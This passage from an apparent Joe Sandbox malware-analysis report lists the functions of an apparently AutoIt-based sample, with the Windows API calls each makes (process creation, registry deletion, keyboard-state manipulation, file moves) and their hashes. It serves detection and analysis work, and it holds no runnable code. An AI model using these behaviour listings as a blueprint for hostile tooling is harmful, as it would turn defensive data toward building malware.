                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X$t:|p:|
                                                        • API String ID: 774024439-2855489919
                                                        • Opcode ID: e9bc4a2812e0de19b62d30aa9fa5c0257c3554f9273d92e1bfff42e5cb5f630c
                                                        • Instruction ID: 66571fb3f330c7528f91816919e2deb533dc9a583bcdf87baa594ac2e4f29489
                                                        • Opcode Fuzzy Hash: e9bc4a2812e0de19b62d30aa9fa5c0257c3554f9273d92e1bfff42e5cb5f630c
                                                        • Instruction Fuzzy Hash: 00C18471508341DFC724EF28C889E9AB7E4BF85310F44492DF896972A2DB78ED45CB92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc42e3ac7c287d3754903d4b97d698f49bc4b715eb5f71999d78aca726181297
                                                        • Instruction ID: 5815e53e6f98d6f045521b30dd2182a0bc4c2b42853ae972e8aa05ac461accbe
                                                        • Opcode Fuzzy Hash: bc42e3ac7c287d3754903d4b97d698f49bc4b715eb5f71999d78aca726181297
                                                        • Instruction Fuzzy Hash: E2719A70900559EFCB14DF98DC88EBEBB74FF85314F208159F915AA251C738AA52CFA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 0077214B
                                                        • _memset.LIBCMT ref: 00772214
                                                        • ShellExecuteExW.SHELL32(?), ref: 00772259
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                          • Part of subcall function 00713BCF: _wcscpy.LIBCMT ref: 00713BF2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00772320
                                                        • FreeLibrary.KERNEL32(00000000), ref: 0077232F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 4082843840-2766056989
                                                        • Opcode ID: ae733b82bfb1fbbb64ddbfc9677104d06912947009ca0571eb72eb5743ebd1d8
                                                        • Instruction ID: 4ed1015e1be2feeed0b059ba86913a794b0597b23a0a6183d336cd2d5b080f4a
                                                        • Opcode Fuzzy Hash: ae733b82bfb1fbbb64ddbfc9677104d06912947009ca0571eb72eb5743ebd1d8
                                                        • Instruction Fuzzy Hash: EB71A371A00619DFCF14EFA8C89599EB7F5FF48310F108059E85AAB392DB38AD41CB90
                                                        APIs
                                                        • GetParent.USER32(?), ref: 0075481D
                                                        • GetKeyboardState.USER32(?), ref: 00754832
                                                        • SetKeyboardState.USER32(?), ref: 00754893
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 007548C1
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 007548E0
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00754926
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00754949
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 57ea388b8c92b4edccb3e42496ded6afc86a737b969ecae0b5303f38e9957f97
                                                        • Instruction ID: 07d8bc15e46073d9051955b58f8d00dbda016f7e9c5ee7d453e650f3f9798d21
                                                        • Opcode Fuzzy Hash: 57ea388b8c92b4edccb3e42496ded6afc86a737b969ecae0b5303f38e9957f97
                                                        • Instruction Fuzzy Hash: 1451C2A05087D53DFB3647248C4ABFABEA95B0630AF088589E9D9468C2D7DCBDCCD750
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00754638
                                                        • GetKeyboardState.USER32(?), ref: 0075464D
                                                        • SetKeyboardState.USER32(?), ref: 007546AE
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007546DA
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007546F7
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0075473B
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0075475C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: bddf7ab53f06b269b33ebfab4c720f313d279efa55c0297e3ab5372efa78fd59
                                                        • Instruction ID: 7c7cb3b706590ccc94d1dc033b4ca88ff12ad6ecedd7b3faae3c02a0f277b209
                                                        • Opcode Fuzzy Hash: bddf7ab53f06b269b33ebfab4c720f313d279efa55c0297e3ab5372efa78fd59
                                                        • Instruction Fuzzy Hash: DB51E5A05047D57DFB3687248C45BF67EA9AB0630AF088889E9D4468C2D3D9ECDCD750
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: 024b5d747b754d5389a60f1ed35d7955e04c5a48dd91fbc9758099774a01b469
                                                        • Instruction ID: c5461df8c47a07b443ec1aff309f6a30c1637e96b9a1b46be5916f70fa48ac67
                                                        • Opcode Fuzzy Hash: 024b5d747b754d5389a60f1ed35d7955e04c5a48dd91fbc9758099774a01b469
                                                        • Instruction Fuzzy Hash: 9B415F75C11214B6DB50ABF4CC8AACFB7ACEF04710F508866E915F3123EA78E25587A6
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00773C92
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00773CBC
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00773D71
                                                          • Part of subcall function 00773C63: RegCloseKey.ADVAPI32(?), ref: 00773CD9
                                                          • Part of subcall function 00773C63: FreeLibrary.KERNEL32(?), ref: 00773D2B
                                                          • Part of subcall function 00773C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00773D4E
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00773D16
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: 8ebbac1783b610ca600a8fd966863ebba47740b010f673437ed76f1dd6637987
                                                        • Instruction ID: 42de0a0fff34772100ad3e1d78228bae74be301402c44dc6de55e8c346f9cefa
                                                        • Opcode Fuzzy Hash: 8ebbac1783b610ca600a8fd966863ebba47740b010f673437ed76f1dd6637987
                                                        • Instruction Fuzzy Hash: A3310971A01209FFDF259B94DC89AFEB7BCEF08340F00856AE516A2151E7789F499B60
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00778DF4
                                                        • GetWindowLongW.USER32(0177C7C8,000000F0), ref: 00778E27
                                                        • GetWindowLongW.USER32(0177C7C8,000000F0), ref: 00778E5C
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00778E8E
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00778EB8
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00778EC9
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00778EE3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: 03b680983bb498eb61048d50a1fc2d5ec3079f37c6f20fb5ec62127145ec9172
                                                        • Instruction ID: e0ec2aff21c8d135fd9ab952b51be34636bd10ab5f8f5e388e8d5d24850b5a73
                                                        • Opcode Fuzzy Hash: 03b680983bb498eb61048d50a1fc2d5ec3079f37c6f20fb5ec62127145ec9172
                                                        • Instruction Fuzzy Hash: 43311531280210EFDF60CF58DC88F6537A5FB4A7A4F158166F5098B2B2CBB9AC41DB46
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00751734
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0075175A
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0075175D
                                                        • SysAllocString.OLEAUT32(?), ref: 0075177B
                                                        • SysFreeString.OLEAUT32(?), ref: 00751784
                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007517A9
                                                        • SysAllocString.OLEAUT32(?), ref: 007517B7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 03e894581ddf869456d6157b8f51fb5472599a6aa0d7a13d2fb727f5063daa9a
                                                        • Instruction ID: a0db6ab81e3e0550944e28b67c2315cf14995f9b06c16edbb56245a2ac1068a4
                                                        • Opcode Fuzzy Hash: 03e894581ddf869456d6157b8f51fb5472599a6aa0d7a13d2fb727f5063daa9a
                                                        • Instruction Fuzzy Hash: 0A215375600219AF9B10DBACCC88DEE73ECEB0D761B408526FD15DB251E678EC4587A4
                                                        APIs
                                                          • Part of subcall function 007131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007131DA
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00756A2B
                                                        • _wcscmp.LIBCMT ref: 00756A49
                                                        • MoveFileW.KERNEL32(?,?), ref: 00756A62
                                                          • Part of subcall function 00756D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00756DBA
                                                          • Part of subcall function 00756D6D: GetLastError.KERNEL32 ref: 00756DC5
                                                          • Part of subcall function 00756D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00756DD9
                                                        • _wcscat.LIBCMT ref: 00756AA4
                                                        • SHFileOperationW.SHELL32(?), ref: 00756B0C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 2323102230-1173974218
                                                        • Opcode ID: 9075d0cbda8424f730036c96867d856b706c271f2bacbfa416d630f00b9ea1e5
                                                        • Instruction ID: d4882212e00c7f493fef641745dea79cb6ad8562d8437ba2ffda14efc2a94fef
                                                        • Opcode Fuzzy Hash: 9075d0cbda8424f730036c96867d856b706c271f2bacbfa416d630f00b9ea1e5
                                                        • Instruction Fuzzy Hash: D6313AB1D00218AADF50EFB4D845BDDB7B8AF08301F5085DAE905E3141EB789B89CF64
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: 01581e9efea12d397e06fcf4d1cd429c236e5adbd23eec460bf02b911f7282fb
                                                        • Instruction ID: 9c98adc429b76a741bf3fa700d5dda878a166b72f11077dab1285f27f01d6e69
                                                        • Opcode Fuzzy Hash: 01581e9efea12d397e06fcf4d1cd429c236e5adbd23eec460bf02b911f7282fb
                                                        • Instruction Fuzzy Hash: 66213A32104211BAD231B634AC0AEFB73A99F56352F504025FC4A871D3EBDD9E87C390
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0075180D
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00751833
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00751836
                                                        • SysAllocString.OLEAUT32 ref: 00751857
                                                        • SysFreeString.OLEAUT32 ref: 00751860
                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 0075187A
                                                        • SysAllocString.OLEAUT32(?), ref: 00751888
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 144185f980c8c34e785da61c46ee78be57a227804216886a8cab00309807c4b6
                                                        • Instruction ID: 1bdb9d28547e35076d0fabe3cd1507cb3fb8f8919a0a0c294cce5be2709b2696
                                                        • Opcode Fuzzy Hash: 144185f980c8c34e785da61c46ee78be57a227804216886a8cab00309807c4b6
                                                        • Instruction Fuzzy Hash: 94213275600204AF9B209BB8CC89DAE77ECEB09371B808526FD15DB261D6B8FC458764
                                                        APIs
                                                          • Part of subcall function 0072C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0072C657
                                                          • Part of subcall function 0072C619: GetStockObject.GDI32(00000011), ref: 0072C66B
                                                          • Part of subcall function 0072C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0072C675
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0077A13B
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0077A148
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0077A153
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0077A162
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0077A16E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 03ad71d84c3c259e7e064dbf44dc3db07b9c6bf1cd3d73665b9b34e74d9cfdb4
                                                        • Instruction ID: 3f89f5bf1c0d6c67cb701740e3e2b87fd030f801d416a6269c7f740f77663368
                                                        • Opcode Fuzzy Hash: 03ad71d84c3c259e7e064dbf44dc3db07b9c6bf1cd3d73665b9b34e74d9cfdb4
                                                        • Instruction Fuzzy Hash: 061198B115011DBEFF155F65CC85EEB7F6DEF08798F018115F608A6090C6769C21DBA4
                                                        APIs
                                                        • __getptd_noexit.LIBCMT ref: 00734C3E
                                                          • Part of subcall function 007386B5: GetLastError.KERNEL32(?,00730127,007388A3,00734673,?,?,00730127,?,0071125D,00000058,?,?), ref: 007386B7
                                                          • Part of subcall function 007386B5: __calloc_crt.LIBCMT ref: 007386D8
                                                          • Part of subcall function 007386B5: GetCurrentThreadId.KERNEL32 ref: 00738701
                                                          • Part of subcall function 007386B5: SetLastError.KERNEL32(00000000,00730127,007388A3,00734673,?,?,00730127,?,0071125D,00000058,?,?), ref: 00738719
                                                        • CloseHandle.KERNEL32(?,?,00734C1D), ref: 00734C52
                                                        • __freeptd.LIBCMT ref: 00734C59
                                                        • RtlExitUserThread.NTDLL(00000000,?,00734C1D), ref: 00734C61
                                                        • GetLastError.KERNEL32(?,?,00734C1D), ref: 00734C91
                                                        • RtlExitUserThread.NTDLL(00000000,?,?,00734C1D), ref: 00734C98
                                                        • __freefls@4.LIBCMT ref: 00734CB4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1445074172-0
                                                        • Opcode ID: f6a9c17afc1068fab6467553c84356fb4b158e9e28c457ae0fc0ec9cb5bc3248
                                                        • Instruction ID: 4391a96e72988886eebb7c255e91f460c8b93f77ded89547770cbcf60124b848
                                                        • Opcode Fuzzy Hash: f6a9c17afc1068fab6467553c84356fb4b158e9e28c457ae0fc0ec9cb5bc3248
                                                        • Instruction Fuzzy Hash: 0E01BCB1401706EBE768BB74D90E909BBA5EF04315F208519F5088B253EF3DEC428AA2
                                                        APIs
                                                        • _memset.LIBCMT ref: 0077E14D
                                                        • _memset.LIBCMT ref: 0077E15C
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007D3EE0,007D3F24), ref: 0077E18B
                                                        • CloseHandle.KERNEL32 ref: 0077E19D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID: $?}$>}
                                                        • API String ID: 3277943733-957941094
